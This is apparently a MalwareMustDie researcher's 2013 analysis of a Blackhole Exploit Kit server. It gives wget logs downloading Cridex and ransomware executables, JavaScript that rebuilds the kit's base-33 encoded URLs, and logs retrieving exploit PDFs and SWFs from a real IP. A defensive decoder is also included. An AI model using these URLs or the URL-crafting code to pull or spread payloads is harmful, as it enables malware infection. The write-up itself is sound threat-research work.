- seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
- :
- GET /forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r http/1.0
- Host: 46.175.224.21:8080
- http request sent, awaiting response...
- :
- http/1.1 200 OK
- Server: nginx/1.0.10
- Date: Mon, 18 Feb 2013 06:08:39 GMT
- Content-Type: application/x-msdownload
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Pragma: public
- Expires: Mon, 18 Feb 2013 06:08:39 GMT
- Cache-Control: must-revalidate, post-check=0, pre-check=0
- Cache-Control: private
- Content-Disposition: attachment; filename="about.exe"
- Content-Transfer-Encoding: binary
- Content-Length: 94208
- :
- 200 OK
- Length: 94208 (92K) [application/x-msdownload]
- Saving to: `./about.exe'
- 2013-02-18 15:08:48 (59.5 KB/s) - `./about.exe' saved [94208/94208]
- --2013-02-18 15:07:55-- h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
- seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
- :
- GET /forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i http/1.0
- Host: 46.175.224.21:8080
- http request sent, awaiting response...
- :
- h00p/1.1 200 OK
- Server: nginx/1.0.10
- Date: Mon, 18 Feb 2013 06:07:48 GMT
- Content-Type: application/x-msdownload
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Pragma: public
- Expires: Mon, 18 Feb 2013 06:07:48 GMT
- Cache-Control: must-revalidate, post-check=0, pre-check=0
- Cache-Control: private
- Content-Disposition: attachment; filename="readme.exe"
- Content-Transfer-Encoding: binary
- Content-Length: 279040
- :
- 200 OK
- Length: 279040 (273K) [application/x-msdownload]
- Saving to: `./readme.exe'
- 2013-02-18 15:08:00 (70.7 KB/s) - `./readme.exe' saved [279040/279040]
- //Payload checks...Cridex & ransomware....
- https://www.virustotal.com/ja/file/bea956049c02eefa07495dda55a1624ba3fe4020ed268094f7b63ec53439d48d/analysis/1361171081/
- https://www.virustotal.com/ja/file/5050a5bdf164767ba6a8432a273942983737b3553c2f0d8fdbab42bbdaab3f6e/analysis/1361171101/
- =============CRACK LOGIC FOR PDF URL==================
- // x(): encodes each char code of s in base 33 and joins the digits with ':'
- function x(s){
-   var d = [];
-   for (var i = 0; i < s.length; i++){
-     var k = (s.charCodeAt(i)).toString(33);
-     d.push(k);
-   }
-   return d.join(":");
- }
- var domain="h00p://46.175.224.21:8080";
- var pdf ="1k:1d:1f:1d:1g:1d:1f";
- var string1 ="/forum/links/public_version.php?tzpiqxci=" + x("244e0") + "&rqoddrzb=" + x("bpc") + "&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=";
- var string2 ="/forum/links/public_version.php?iitxovwc=" + x("244e0") + "&hic=" + x("c") + "&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=" ;
- var string3 ="/forum/links/public_version.php?hysb=" + x("c833f") + "&togkor=" + x("oyt") + "&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=";
- var string4 ="/forum/links/public_version.php?myedivup=" + x("c833f") + ">aaynbu=" + x("h") + "&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=";
- var url1 = domain + string1 + pdf;
- var url2 = domain + string2 + pdf;
- var url3 = domain + string3 + pdf;
- var url4 = domain + string4 + pdf;
- document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
- // output:
- h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
- h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
- h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
- h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33>aaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
- //=============CRACK LOGIC FOR SWF URL==================
- // x(): same base-33 encoder as in the PDF section above
- function x(s){
-   var d = [];
-   for (var i = 0; i < s.length; i++){
-     var k = (s.charCodeAt(i)).toString(33);
-     d.push(k);
-   }
-   return d.join(":");
- }
- var domain="h00p://46.175.224.21:8080";
- var url1 = domain + "/forum/links/public_version.php?jwio=" + x("244e0") + "&xnrj=" + x("nxjmw") + "&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg";
- var url2 = domain + "/forum/links/public_version.php?ecxrx=" + x("244e0") + "&pihpkcv=" + x("tlil") + "&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda";
- var url3 = domain + "/forum/links/public_version.php?jsehhtfz=" + x("c833f") + "&rrhjmwf=" + x("eomsp") + "&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms";
- var url4 = domain + "/forum/links/public_version.php?efoo=" + x("c833f") + "&bpsmrsqj=" + x("wdrh") + "&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx";
- document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
- // output
- h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
- h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
- h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
- h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
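- Both crack-logic blocks above (PDF and SWF) build URLs with the same x() scheme: every character's code in base 33, joined with ':'. The block below is an added example, not from the original paste, that implements the inverse so the encoded query values can be read back out of proxy logs; the encoder mirrors x(), the decoder and query walker are my own.

```javascript
// Added example (not part of the paste): decode BHEK's base-33 ':'-joined
// query values, e.g. "1h:1j:1j:32:1f" -> "244e0".

// Same transform as the landing page's x(): char code -> base 33.
function bhekEncode(s) {
  var out = [];
  for (var i = 0; i < s.length; i++) {
    out.push(s.charCodeAt(i).toString(33));
  }
  return out.join(":");
}

// Inverse of bhekEncode. Base-33 digits are 0-9 and a-w; any other token
// means the value is not in this encoding, so null is returned rather
// than silently producing garbage.
function bhekDecode(v) {
  var tokens = v.split(":");
  var chars = [];
  for (var i = 0; i < tokens.length; i++) {
    if (!/^[0-9a-w]{1,2}$/.test(tokens[i])) return null;
    chars.push(String.fromCharCode(parseInt(tokens[i], 33)));
  }
  return chars.join("");
}

// Walk a captured query string; values that decode are replaced by their
// plaintext, anything else is kept verbatim.
function decodeQuery(query) {
  var result = {};
  var pairs = query.replace(/^\?/, "").split("&");
  for (var i = 0; i < pairs.length; i++) {
    var eq = pairs[i].indexOf("=");
    if (eq < 0) continue;
    var key = pairs[i].slice(0, eq);
    var val = pairs[i].slice(eq + 1);
    var dec = val.indexOf(":") !== -1 ? bhekDecode(val) : null;
    result[key] = dec !== null ? dec : val;
  }
  return result;
}

// Sample input: the query string of the first PDF URL from the paste.
var SAMPLE_QUERY = "tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30" +
  "&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f";
```

Run decodeQuery(SAMPLE_QUERY) to see the four parameters in clear; the last one decodes to a dotted version-like string.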
- //=============LET's FLUSH THEM (4 PDF + 4 SWF) ALL!!! =============
- //pdf
- --2013-02-18 15:50:22-- h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 20161 (20K) [application/pdf]
- Saving to: `./pdf1.pdf'
- 100%[==============================================================================>] 20,161 32.3K/s in 0.6s
- 2013-02-18 15:50:24 (32.3 KB/s) - `./pdf1.pdf' saved [20161/20161]
- --2013-02-18 15:50:53-- h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 11194 (11K) [application/pdf]
- Saving to: `./pdf2.pdf'
- 100%[==============================================================================>] 11,194 32.5K/s in 0.3s
- 2013-02-18 15:50:54 (32.5 KB/s) - `./pdf2.pdf' saved [11194/11194]
- --2013-02-18 15:51:22-- h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 20161 (20K) [application/pdf]
- Saving to: `./pdf3.pdf'
- 100%[==============================================================================>] 20,161 31.6K/s in 0.6s
- 2013-02-18 15:51:24 (31.6 KB/s) - `./pdf3.pdf' saved [20161/20161]
- --2013-02-18 15:52:02-- h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33>aaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 11160 (11K) [application/pdf]
- Saving to: `./pdf4.pdf'
- 100%[==============================================================================>] 11,160 34.6K/s in 0.3s
- 2013-02-18 15:52:03 (34.6 KB/s) - `./pdf4.pdf' saved [11160/11160]
- // flash....
- --2013-02-18 15:54:34-- h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 7981 (7.8K) [text/html]
- Saving to: `./flash1.swf'
- 100%[==============================================================================>] 7,981 26.7K/s in 0.3s
- 2013-02-18 15:54:36 (26.7 KB/s) - `./flash1.swf' saved [7981/7981]
- --2013-02-18 15:54:58-- h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 1030 (1.0K) [text/html]
- Saving to: `./flash2.swf'
- 100%[==============================================================================>] 1,030 --.-K/s in 0s
- 2013-02-18 15:54:59 (35.5 MB/s) - `./flash2.swf' saved [1030/1030]
- --2013-02-18 15:55:14-- h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 7981 (7.8K) [text/html]
- Saving to: `./flash3.swf'
- 100%[==============================================================================>] 7,981 25.5K/s in 0.3s
- 2013-02-18 15:55:15 (25.5 KB/s) - `./flash3.swf' saved [7981/7981]
- --2013-02-18 15:57:54-- h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 1030 (1.0K) [text/html]
- Saving to: `./flash4.swf'
- 100%[==============================================================================>] 1,030 --.-K/s in 0s
- 2013-02-18 15:57:55 (36.2 MB/s) - `./flash4.swf' saved [1030/1030]
- =========================
- BHEK has Geo-IP functions built in...
- Reference: http://ondailybasis.com/blog/?p=1483
- =======================-
- ----
- #MalwareMustDie | @unixfreaxjp